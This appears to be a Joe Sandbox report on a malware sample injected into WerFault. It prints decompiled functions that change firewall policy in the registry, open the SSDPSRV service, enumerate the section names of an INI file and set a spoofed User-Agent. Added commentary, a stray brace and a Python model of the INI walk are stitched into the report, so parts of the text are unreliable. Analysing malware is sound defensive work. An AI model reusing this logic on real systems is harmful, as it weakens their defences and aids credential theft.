                        			E0288058A(void* __ebx, void* __ecx, short* __esi, void* _a4) {
                        				void* _v8;
                        				char _v24;
                        				intOrPtr _t101;
                        				intOrPtr _t102;
                        				intOrPtr _t103;
                        				short* _t110;
                        				intOrPtr _t112;
                        				intOrPtr _t114;
                        				intOrPtr _t117;
                        				void* _t120;
                        				short* _t136;
                        				signed int _t145;
                        
                        				_t136 = __esi;
                        				_t120 = __ebx;
                        				if(__esi == 0 ||  *__esi != 0x2a ||  *((intOrPtr*)(__esi + 0x16)) == 0 ||  *((intOrPtr*)(__esi + 0x1e)) == 0) {
                        					__eflags = 0;
                        					return 0;
                        				} else {
                        					_v8 = 0;
                        					E02861493(__ecx,  *((intOrPtr*)(__esi + 0x12)),  *0x289f2e8, 0x2672);
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x172)) = 0;
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x1a)) =  *((intOrPtr*)(__esi + 0xe));
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x1e)) =  *((intOrPtr*)(__esi + 0x16));
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x12e)) =  *((intOrPtr*)(__esi + 0x1e));
                        					_t127 =  *((intOrPtr*)(__esi + 0x1a));
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x11e)) =  *((intOrPtr*)(__esi + 0x1a));
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x142)) = 0;
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x15a)) = 0;
                        					 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x2666)) = 0;
                        					if( *((intOrPtr*)(__esi + 0x1a)) == 0) {
                        						 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x122)) = 0;
                        						 *((intOrPtr*)( *((intOrPtr*)(__esi + 0x12)) + 0x126)) = 0;
                        					}
                        					_push(_t120);
                        					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) == 1) {
                        						 *((short*)( *((intOrPtr*)(_t136 + 0x12)) + 4)) = 0;
                        						_t117 =  *((intOrPtr*)(_t136 + 0x12));
                        						_t127 = 0x80;
                        						_t34 = _t117 + 4;
                        						 *_t34 =  *(_t117 + 4) | 0x00000080;
                        						_t145 =  *_t34;
                        					}
                        					E028614DB(_t127,  &_v24, 0, 0x10);
                        					 *0x289fa84( &_v24, "SB:0x%08X",  *((intOrPtr*)(_t136 + 6)));
                        					if(E0286319B(_t145,  &_v24, 0x43) == 1 || ( *( *0x289f2e8 + 0xa) & 0x00000080) != 0) {
                        						 *( *((intOrPtr*)(_t136 + 0x12)) + 0xa) =  *( *((intOrPtr*)(_t136 + 0x12)) + 0xa) | 0x00000080;
                        					}
                        					_t101 =  *((intOrPtr*)(_t136 + 0x12));
                        					if( *((intOrPtr*)(_t136 + 0xa)) != 6) {
                        						_t128 = 0x88;
                        						 *((short*)(_t101 + 4)) = 0x88;
                        						_t102 =  *((intOrPtr*)(_t136 + 0x12));
                        						__eflags =  *(_t102 + 0xa) & 0x00000002;
                        						if(( *(_t102 + 0xa) & 0x00000002) == 0) {
                        							_t60 = _t102 + 0xa;
                        							 *_t60 =  *(_t102 + 0xa) | 0x00000002;
                        							__eflags =  *_t60;
                        						}
                        						_t103 =  *((intOrPtr*)(_t136 + 0x12));
                        						__eflags =  *(_t103 + 0xa) & 0x00000001;
                        						if(( *(_t103 + 0xa) & 0x00000001) != 0) {
                        							_t66 = _t103 + 0xa;
                        							 *_t66 =  *(_t103 + 0xa) & 0xfffffffe;
                        							__eflags =  *_t66;
                        						}
                        					} else {
                        						_t128 = 1;
                        						 *((short*)(_t101 + 4)) = 1;
                        						_t114 =  *((intOrPtr*)(_t136 + 0x12));
                        						if(( *(_t114 + 0xa) & 1) == 0) {
                        							 *(_t114 + 0xa) =  *(_t114 + 0xa) | 1;
                        						}
                        					}
                        					E028614DB(_t128,  *((intOrPtr*)(_t136 + 0x12)) + 0x106, 0, 0x18);
                        					DuplicateHandle(0xffffffff,  *(_t136 + 0x26), _a4,  &_v8, 0, 0, 2); // executed
                        					if(_v8 != 0) {
                        						FindCloseChangeNotification( *(_t136 + 0x26)); // executed
                        					}
                        					 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x12)) + 0x22)) = _v8;
                        					_t110 =  *((intOrPtr*)(_t136 + 0x22));
                        					if(_t110 != 0 &&  *_t110 == 0xe) {
                        						_t112 =  *((intOrPtr*)(_t110 + 2));
                        						if(_t112 != 0) {
                        							 *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x12)) + 0x26)) = _t112;
                        						}
                        					}
                        					return 1;
                        				}
                        			}

                        0x0288058a
                        0x0288058a
                        0x02880595
                        0x0288073e
                        0x00000000
                        0x028805b7
                        0x028805c2
                        0x028805c8
                        0x028805d0
                        0x028805dc
                        0x028805e5
                        0x028805ee
                        0x028805f7
                        0x028805fa
                        0x02880603
                        0x0288060c
                        0x02880615
                        0x0288061e
                        0x02880623
                        0x0288062c
                        0x0288062c
                        0x0288063b
                        0x02880649
                        0x02880650
                        0x02880654
                        0x02880657
                        0x02880659
                        0x02880659
                        0x02880659
                        0x02880659
                        0x02880668
                        0x02880677
                        0x0288068d
                        0x0288069c
                        0x0288069c
                        0x028806a3
                        0x028806a7
                        0x028806bd
                        0x028806c2
                        0x028806c6
                        0x028806c9
                        0x028806cd
                        0x028806cf
                        0x028806cf
                        0x028806cf
                        0x028806cf
                        0x028806d3
                        0x028806d6
                        0x028806da
                        0x028806dc
                        0x028806dc
                        0x028806dc
                        0x028806dc
                        0x028806a9
                        0x028806ab
                        0x028806ac
                        0x028806b0
                        0x028806b6
                        0x028806b8
                        0x028806b8
                        0x028806b6
                        0x028806ee
                        0x02880703
                        0x0288070c
                        0x02880711
                        0x02880711
                        0x0288071d
                        0x02880720
                        0x02880725
                        0x0288072d
                        0x02880732
                        0x02880737
                        0x02880737
                        0x02880732
                        0x00000000
                        0x0288073a

                        APIs
                        • DuplicateHandle.KERNELBASE(000000FF,?,?,?,00000000,00000000,00000002,?,00000000,00000018,00000043), ref: 02880703
                        • FindCloseChangeNotification.KERNEL32(?), ref: 02880711
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseDuplicateFindHandleNotification
                        • String ID: SB:0x%08X
                        • API String ID: 1784815957-3322750355
                        • Opcode ID: 705693f2d79e4b55e14b71eb5776bc359ab22b95c016e4a0c93045befe2c3664
                        • Instruction ID: f20d08da90cf8f76141a7e696c435b148f406ba79f350524b7ff76f9798acd20
                        • Opcode Fuzzy Hash: 705693f2d79e4b55e14b71eb5776bc359ab22b95c016e4a0c93045befe2c3664
                        • Instruction Fuzzy Hash: 63516E7C6847009FCB38EF58C449EA7B7F1AF48304B15895DE48AC7AA2D331E948DB14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • OpenSCManagerW.SECHOST(00000000,00000000,00000005,?,?,?,?,?,?,?,?,0286D741), ref: 0288D9A7
                        • OpenServiceW.ADVAPI32(00000000,SSDPSRV,00000016,00000D56,?,?,?,?,?,?,?,?,0286D741), ref: 0288D9C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Open$ManagerService
                        • String ID: SSDPSRV
                        • API String ID: 2351955762-122354904
                        • Opcode ID: c96add33d599a45b20e8f9c2370291c4c3e5797933f4fb78651604f198d3e2f7
                        • Instruction ID: ee1d241b75b7b2a57f1aeeca9f50a3c9df199e83e330f82e350c22e4a6d7ba41
                        • Opcode Fuzzy Hash: c96add33d599a45b20e8f9c2370291c4c3e5797933f4fb78651604f198d3e2f7
                        • Instruction Fuzzy Hash: C011AB7D985224FBCB202F769C4DD9F3EADEF55BA5B240910F20AD24C0DB70C560C660
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0288A80E
                        • PendingFileRenameOperations, xrefs: 0288A82D
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                        • API String ID: 3535843008-3023217399
                        • Opcode ID: 8bc180eb4ca7d7f8faf17a610ba29898e12c6b4e39858b5ce267387acb33624f
                        • Instruction ID: 5e60bc2d5b06004718b3ce07745193ce94847031923975d37f3934b25c28913f
                        • Opcode Fuzzy Hash: 8bc180eb4ca7d7f8faf17a610ba29898e12c6b4e39858b5ce267387acb33624f
                        • Instruction Fuzzy Hash: 3C119A7D980208BBDB24DF94DC8CEEEBFBCAF51744F184056B909E2191D3309A91DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02862B27(void* __ecx, short* _a4) {
                        				void* _v8;
                        				char _v12;
                        				void* _t10;
                        				long _t13;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				if(_a4 == 0) {
                        					L4:
                        					_t10 = 0;
                        				} else {
                        					_v8 = 0;
                        					_v12 = 0;
                        					if(E028619E8(_a4) == 0) {
                        						goto L4;
                        					} else {
                        						_t13 = RegCreateKeyExW(0x80000002, _a4, 0, 0, 0, 0x102, 0,  &_v8, 0); // executed
                        						if(_t13 != 0) {
                        							goto L4;
                        						} else {
                        							L02887821(_v8, L"EnableFirewall", 0, 4,  &_v12, 4); // executed
                        							 *0x289fb1c(_v8);
                        							_t10 = 1;
                        						}
                        					}
                        				}
                        				return _t10;
                        			}

                        0x02862b2a
                        0x02862b2b
                        0x02862b32
                        0x02862b89
                        0x02862b89
                        0x02862b34
                        0x02862b37
                        0x02862b3a
                        0x02862b44
                        0x00000000
                        0x02862b46
                        0x02862b5c
                        0x02862b64
                        0x00000000
                        0x02862b66
                        0x02862b77
                        0x02862b7f
                        0x02862b85
                        0x02862b85
                        0x02862b64
                        0x02862b44
                        0x02862b8d

                        APIs
                        • RegCreateKeyExW.KERNEL32(80000002,02867A3D,00000000,00000000,00000000,00000102,00000000,?,00000000,SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s,?,?,?,02867A3D,?), ref: 02862B5C
                        Strings
                        • EnableFirewall, xrefs: 02862B6F
                        • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s, xrefs: 02862B2C
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create
                        • String ID: EnableFirewall$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s
                        • API String ID: 2289755597-228630715
                        • Opcode ID: 16685ab5b451a259b300204198eb3d1ac9eb132bc3b2c7d4cab17e1160434812
                        • Instruction ID: a89577f8783c312b7605852a6f11d1598c18cb4b0ac174c7ba0acc35e582838b
                        • Opcode Fuzzy Hash: 16685ab5b451a259b300204198eb3d1ac9eb132bc3b2c7d4cab17e1160434812
                        • Instruction Fuzzy Hash: 69F0817C501129FADF109F91DC4AEEFBF6CDF02760F104055BE08E5140D2708A50DAE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02888F9A(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				long _v16;
                        				intOrPtr _v20;
                        				int _t18;
                        
                        				_t23 = __ecx;
                        				_v20 = __ecx;
                        				_v8 = _v8 | 0xffffffff;
                        				_t18 = GetPriorityClass(_v8); // executed
                        				_v16 = _t18;
                        				if(_v16 != 0) {
                        					_t18 = SetPriorityClass(_v8, 0x4000); // executed
                        				}
                        				if(_a4 == 0) {
                        					_t18 = E02888A53(_t23, 1);
                        				}
                        				_t24 = _v20;
                        				_v12 = E0288978C(_t18, _v20, _a4, _a8);
                        				if(_a4 == 0) {
                        					E02888A53(_t24, 0);
                        				}
                        				if(_v16 != 0) {
                        					SetPriorityClass(_v8, _v16); // executed
                        				}
                        				return _v12;
                        			}

                        0x02888f9a
                        0x02888fa0
                        0x02888fa3
                        0x02888faa
                        0x02888fb0
                        0x02888fb7
                        0x02888fc1
                        0x02888fc1
                        0x02888fcb
                        0x02888fcf
                        0x02888fcf
                        0x02888fda
                        0x02888fe2
                        0x02888fe9
                        0x02888fed
                        0x02888fed
                        0x02888ff6
                        0x02888ffe
                        0x02888ffe
                        0x02889008

                        APIs
                        • GetPriorityClass.KERNEL32(000000FF,00000000), ref: 02888FAA
                        • SetPriorityClass.KERNEL32(000000FF,00004000), ref: 02888FC1
                        • SetPriorityClass.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02888FFE
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassPriority
                        • String ID:
                        • API String ID: 2576577285-0
                        • Opcode ID: 52a6e781ff697d8c942f170005eaaa6d259620d8612a845279a0822b106d1b5b
                        • Instruction ID: a576ec7dc1b1995c5cbc13b0d25059db0824584f81d966842919a4580f271b1e
                        • Opcode Fuzzy Hash: 52a6e781ff697d8c942f170005eaaa6d259620d8612a845279a0822b106d1b5b
                        • Instruction Fuzzy Hash: 5801DD3CC0020DFBDF15AFA4D809B9CBB72EF00319F5485A4E625A62E0C7754AA4DF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E02884F0A(void* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
                        				intOrPtr _v8;
                        				intOrPtr* _v12;
                        				signed short* _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				signed int* _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				short _v54;
                        				char _v56;
                        				signed int _t79;
                        				signed int _t82;
                        				void* _t83;
                        				signed int* _t87;
                        				signed int _t95;
                        				signed int _t99;
                        				void* _t105;
                        				intOrPtr _t106;
                        				intOrPtr _t108;
                        				intOrPtr _t110;
                        				void* _t120;
                        				intOrPtr _t122;
                        				intOrPtr _t125;
                        				intOrPtr* _t127;
                        				signed int _t128;
                        				intOrPtr _t130;
                        				void* _t133;
                        				intOrPtr _t134;
                        				signed int _t137;
                        				char* _t139;
                        				intOrPtr _t140;
                        				intOrPtr* _t143;
                        
                        				if(__ecx == 0 || _a8 == 0) {
                        					L39:
                        					return _t79 | 0xffffffff;
                        				} else {
                        					_t122 = _a12;
                        					if(_t122 == 0) {
                        						goto L39;
                        					}
                        					_t82 = _a4 * 0x28;
                        					_t110 = __ecx + _t82;
                        					_t134 =  *((intOrPtr*)(_t110 + 0x20));
                        					_v28 = _t82;
                        					_v36 = _t110;
                        					_v8 = _t134;
                        					_v24 = 0;
                        					_v40 = _t122 -  *(_t110 + 0x24);
                        					if(_t134 != 0) {
                        						_t125 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                        						_v48 = _t125;
                        						if( *((intOrPtr*)(_t125 + 0x7c)) != 0) {
                        							_t133 =  *((intOrPtr*)(_t125 + 0x78)) + _t134;
                        							_t106 =  *((intOrPtr*)(_t133 + 0x18));
                        							if(_t106 == 0 ||  *((intOrPtr*)(_t133 + 0x14)) == 0) {
                        								_push(0xfffffffc);
                        								L5:
                        								_pop(_t83);
                        								return _t83;
                        							} else {
                        								_v20 = _v20 & 0x00000000;
                        								_t127 =  *((intOrPtr*)(_t133 + 0x20)) + _t134;
                        								_v12 = _t127;
                        								_v16 =  *((intOrPtr*)(_t133 + 0x24)) + _v8;
                        								if(_t106 != 0) {
                        									while(1) {
                        										_t108 =  *_t127 + _v8;
                        										_t137 =  *(_t110 + 0x24);
                        										_t30 = _t82 + 0x2899628; // 0x32335f32
                        										_v32 = E028850F7(_t108, _t30);
                        										_t87 = _v40 + _t137;
                        										_t128 = _t137;
                        										_v44 = _t87;
                        										if(_t137 >= _t87) {
                        											goto L35;
                        										}
                        										_t139 = _t137 * 0xc + _a8 + 8;
                        										while( *((char*)(_t139 + 1)) == _a4 && _t128 < _a12) {
                        											if(_t108 == 0 ||  *((intOrPtr*)(_t139 - 8)) != _v32 ||  *_t139 != E028619D6(_t108)) {
                        												_t128 = _t128 + 1;
                        												_t139 = _t139 + 0xc;
                        												if(_t128 < _v44) {
                        													continue;
                        												}
                        												goto L35;
                        											} else {
                        												_t95 =  *_v16 & 0x0000ffff;
                        												if(_t95 == 0xffffffff || _t95 >  *((intOrPtr*)(_t133 + 0x14))) {
                        													return 0;
                        												} else {
                        													_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x1c)) + _t95 * 4 + _v8)) + _v8;
                        													_v44 =  *((intOrPtr*)(_t128 * 0xc + _a8 + 4));
                        													_t130 =  *((intOrPtr*)(_v28 + 0x2899648));
                        													if(_t130 == 0) {
                        														L33:
                        														if(_t99 != 0) {
                        															_v24 = _v24 + 1;
                        															 *_v44 = _t99;
                        														}
                        														goto L35;
                        													}
                        													_t140 = _v48;
                        													if(_t140 == 0) {
                        														goto L33;
                        													}
                        													if(_t99 == 0) {
                        														goto L35;
                        													}
                        													_t120 =  *((intOrPtr*)(_t140 + 0x78)) + _t130;
                        													if(_t99 > _t120 && _t99 <  *((intOrPtr*)(_t140 + 0x7c)) + _t120) {
                        														_t143 =  *0x289f574;
                        														if(_t143 == 0) {
                        															L32:
                        															_t99 = 0;
                        															goto L33;
                        														}
                        														_v32 = _v32 & 0x00000000;
                        														_v52 = _t108;
                        														_v56 = E028619D6(_t108);
                        														_v54 = _v56 + 1;
                        														_t105 =  *_t143(_t130,  &_v56, 0,  &_v32); // executed
                        														if(_t105 < 0) {
                        															goto L32;
                        														}
                        														_t99 = _v32;
                        													}
                        													goto L33;
                        												}
                        											}
                        										}
                        										L35:
                        										_v20 = _v20 + 1;
                        										_v12 = _v12 + 4;
                        										_v16 =  &(_v16[1]);
                        										if(_v20 <  *((intOrPtr*)(_t133 + 0x18))) {
                        											_t127 = _v12;
                        											_t82 = _v28;
                        											_t110 = _v36;
                        											continue;
                        										}
                        										goto L11;
                        									}
                        								}
                        								L11:
                        								return _v24;
                        							}
                        						}
                        						_push(0xfffffffd);
                        						goto L5;
                        					}
                        					_push(0xfffffffe);
                        					goto L5;
                        				}
                        			}

                        0x02884f17
                        0x028850ed
                        0x00000000
                        0x02884f26
                        0x02884f26
                        0x02884f2b
                        0x00000000
                        0x00000000
                        0x02884f34
                        0x02884f37
                        0x02884f39
                        0x02884f3f
                        0x02884f42
                        0x02884f45
                        0x02884f48
                        0x02884f4b
                        0x02884f50
                        0x02884f5d
                        0x02884f5f
                        0x02884f65
                        0x02884f6e
                        0x02884f70
                        0x02884f75
                        0x028850e6
                        0x02884f54
                        0x02884f54
                        0x00000000
                        0x02884f85
                        0x02884f88
                        0x02884f8c
                        0x02884f94
                        0x02884f97
                        0x02884f9c
                        0x02884faf
                        0x02884fb1
                        0x02884fb4
                        0x02884fb7
                        0x02884fc4
                        0x02884fca
                        0x02884fcc
                        0x02884fce
                        0x02884fd3
                        0x00000000
                        0x00000000
                        0x02884fdf
                        0x02884fe3
                        0x02884ffb
                        0x02885013
                        0x02885014
                        0x0288501a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02885021
                        0x02885024
                        0x0288502a
                        0x00000000
                        0x02885039
                        0x02885048
                        0x02885051
                        0x02885057
                        0x0288505f
                        0x028850ba
                        0x028850bc
                        0x028850c1
                        0x028850c4
                        0x028850c4
                        0x00000000
                        0x028850bc
                        0x02885061
                        0x02885066
                        0x00000000
                        0x00000000
                        0x0288506a
                        0x00000000
                        0x00000000
                        0x0288506f
                        0x02885073
                        0x0288507e
                        0x02885086
                        0x028850b8
                        0x028850b8
                        0x00000000
                        0x028850b8
                        0x02885088
                        0x0288508e
                        0x02885096
                        0x0288509e
                        0x028850ad
                        0x028850b1
                        0x00000000
                        0x00000000
                        0x028850b3
                        0x028850b3
                        0x00000000
                        0x02885073
                        0x0288502a
                        0x02884ffb
                        0x028850c6
                        0x028850c6
                        0x028850cc
                        0x028850d0
                        0x028850d7
                        0x02884fa6
                        0x02884fa9
                        0x02884fac
                        0x00000000
                        0x02884fac
                        0x00000000
                        0x028850dd
                        0x02884faf
                        0x02884f9e
                        0x00000000
                        0x02884f9e
                        0x02884f75
                        0x02884f67
                        0x00000000
                        0x02884f67
                        0x02884f52
                        0x00000000
                        0x02884f52

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: kernel32.dll
                        • API String ID: 0-1793498882
                        • Opcode ID: 830b02f189fe987976ec32ff5b7dcc39e41fb09a6685f8571898ddfb110a50ba
                        • Instruction ID: 3ad1f59601396b9d2c0899e24ae6ea1f25b52a5d481636f7b9d443aa78e93927
                        • Opcode Fuzzy Hash: 830b02f189fe987976ec32ff5b7dcc39e41fb09a6685f8571898ddfb110a50ba
                        • Instruction Fuzzy Hash: 93618B7DE0021A9BCB10DF58C980AAEB7B5FF48318B66865AD819E7241D734E941CFD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02879787(short* _a4, intOrPtr _a8, WCHAR* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				WCHAR* _v16;
                        				long _v20;
                        				char _v540;
                        				void* __ebx;
                        				void* __edi;
                        				WCHAR* _t33;
                        				long _t34;
                        				void* _t44;
                        				signed int _t45;
                        				signed int _t48;
                        				short* _t54;
                        
                        				_t48 = 0;
                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                        					L14:
                        					return 0;
                        				} else {
                        					_t50 = _a12;
                        					if(E028619E8(_a12) < 6) {
                        						goto L14;
                        					}
                        					_v8 = 0;
                        					_v12 = 0;
                        					_t33 = E0286161B(0x8000);
                        					_v16 = _t33;
                        					if(_t33 == 0) {
                        						goto L14;
                        					}
                        					// Returns the number of WCHARs copied (final terminator excluded); that count bounds the walk below.
                        					_t34 = GetPrivateProfileSectionNamesW(_t33, 0x8000, _a12); // executed
                        					_v20 = _t34;
                        					if(_t34 == 0) {
                        						L13:
                        						E028617E4(_v16);
                        						return _v8;
                        					}
                        					_t54 = _a4; // output records, 0x210 bytes each
                        					// Walk the double-NUL-terminated section-name list, one name per iteration;
                        					// _v12 is the WCHAR offset of the current name and is advanced by wcslen(name) + 1 at the bottom.
                        					while(1) {
                        						E028614DB(_t50,  &_v540, _t48, 0x208);
                        						// The bound test is '>' and precedes the write, so if _a8 is the record capacity the loop
                        						// can fill _a8 + 1 records (as decompiled; the caller's contract is not visible in this report).
                        						if(_v8 > _a8) {
                        							goto L13;
                        						}
                        						// Unresolved import slot: copies the current name into _v540 (its length drives the advance below).
                        						_push( &(_v16[_v12]));
                        						_push( &_v540);
                        						if( *0x289f6ac() != 0) {
                        							 *_t54 = 0x210; // first WORD of the record = 0x210, matching the record stride
                        							if(E028795C9( &_v540, _t54, _a12) != 0) {
                        								_v8 = _v8 + 1;
                        								_t54 = _t54 + 0x210;
                        							}
                        							}
                        						}
                        						_t44 = E028619E8( &_v540);
                        						_t50 = _v12;
                        						_t26 = _t44 + 1; // 0x21
                        						_t45 = _v12 + _t26;
                        						_v12 = _t45;
                        						if(_t45 < _v20) {
                        							_t48 = 0;
                        							continue;
                        						} else {
                        							goto L13;
                        						}
                        					}
                        					goto L13;
                        				}
                        			}
                        Instruction addresses (the report's per-statement address column; its alignment to the code lines above was lost in extraction): 0x02879791 .. 0x02879874

                        APIs
                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,00008000,02879A4C,00008000,%s\3\%s,00000000), ref: 028797E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: NamesPrivateProfileSection
                        • String ID: %s\3\%s
                        • API String ID: 709140578-3598443546
                        • Opcode ID: 0bb51704cd84aa5319029d2bd194631b100c7a2985f7327c0e105a69f1f29815
                        • Instruction ID: 24c0350120b4418da4e8087bc118fe94c43ee63ec83b5b20dfb73d1e570cb0e3
                        • Opcode Fuzzy Hash: 0bb51704cd84aa5319029d2bd194631b100c7a2985f7327c0e105a69f1f29815
                        • Instruction Fuzzy Hash: E7212B7D90024DEBCF10DFE4C8C89AEB77ABF00348F18496AE41AE6251DB30DA55CB50
                        Uniqueness

                        Uniqueness Score: -1.00%
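The section-name walk in E02879787, as an added example that is not code from the report or from the sample: section_names_buffer builds the buffer GetPrivateProfileSectionNamesW would return for a constructed INI text, and walk_sections mirrors the decompiled loop (advance by wcslen(name) + 1 WCHARs, stop when the offset reaches the returned count) including its '>' bound test. Treating _a8 as a record capacity, and counting every name rather than only successfully written records, are simplifications of this example, not facts from the report.

```python
# Added example, not code from the report or the sample: models the buffer
# GetPrivateProfileSectionNamesW fills and the walk E02879787 performs over it.
import re


def section_names_buffer(ini_text):
    """Return (buffer, copied) as the API would for the given INI text:
    every section name NUL-terminated, then one extra NUL; `copied` is the
    number of WCHARs written excluding that final terminator, which is the
    API's return value on success. ini_text is constructed input."""
    names = re.findall(r"^[ \t]*\[([^\]\r\n]*)\]", ini_text, re.MULTILINE)
    joined = "".join(name + "\0" for name in names)
    return (joined + "\0").encode("utf-16-le"), len(joined)


def walk_sections(buf, copied, max_records):
    """Mirror of the decompiled loop: take the name at the current WCHAR
    offset, advance by len(name) + 1, stop once the offset reaches `copied`.
    The bound test is `records > max_records` before the record is written
    (as decompiled), so with max_records read as a capacity the result can
    hold max_records + 1 names. Reading _a8 as a capacity is this example's
    assumption; the caller's contract is not visible in the report."""
    text = buf.decode("utf-16-le")
    records, offset = [], 0
    while offset < copied:
        name = text[offset:text.index("\0", offset)]
        if len(records) > max_records:      # '>' rather than '>=', as decompiled
            break
        records.append(name)
        offset += len(name) + 1             # wcslen(name) + 1, as in the sample
    return records


# Constructed INI text standing in for whatever file the sample enumerates.
SAMPLE_INI = "[global]\nhost=example.invalid\n\n[site1]\nuser=a\n[site2]\n[site3]\n"

if __name__ == "__main__":
    buf, copied = section_names_buffer(SAMPLE_INI)
    print(copied, walk_sections(buf, copied, 10))
    print(len(walk_sections(buf, copied, 2)))   # one past the nominal limit
```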

                        C-Code - Quality: 43%
                        			E0287A8E1(void* __ecx, void* __esi) {
                        				char _v264;
                        				void* _t19;
                        				long _t20;
                        				void* _t22;
                        				signed int _t23;
                        				void* _t36;
                        
                        				_t36 = __esi;
                        				if( *((intOrPtr*)(__esi + 0x64)) == 0xc0) {
                        					E028614DB(__ecx,  &_v264, 0, 0x104);
                        					// Try to obtain a User-Agent string (0x103 = max chars); on failure fall back to the
                        					// hard-coded IE7 / Windows Server 2003 x64 / .NET 2.0 string.
                        					_t19 = E02864199(0x103, __ecx,  &_v264); // executed
                        					if(_t19 == 0) {
                        						 *0x289f6a0( &_v264, "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)", 0x103);
                        					}
